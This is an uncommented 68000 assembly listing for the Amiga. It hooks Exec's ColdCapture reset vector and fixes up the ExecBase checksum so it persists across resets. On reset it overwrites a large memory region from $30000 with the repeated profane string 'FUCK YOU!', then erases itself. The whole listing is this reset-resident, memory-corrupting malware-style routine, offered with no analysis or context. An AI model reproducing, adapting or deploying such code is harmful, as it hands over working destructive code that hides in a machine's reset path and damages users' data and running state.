
ORG	$7F000
LOAD	$7F000

S:	MOVE.L	$04.W,A6
	MOVE.L	#RESET,A0
	MOVE.L	A0,42(A6)
	LEA	34(A6),A1
	CLR.W	D0
	MOVE.W	#$0017,D1
S_1:	ADD.W	(A1)+,D0
	DBF	D1,S_1
	NOT.W	D0
	MOVE.W	D0,(A1)
	RTS

RESET:	MOVE.L	#$30000,A0
	MOVE.W	#$9800,D7

R:	MOVE.L	#'FUCK',(A0)+
	MOVE.L	#'YOU!',(A0)+
	DBF	D7,R

HIT:	MOVE.L	#S,A0
H:	CLR.B	(A0)+
	CMP.L	#HIT,A0
	BNE	H
	MOVE.L	#'HEJ!',H
	JMP	(A5)

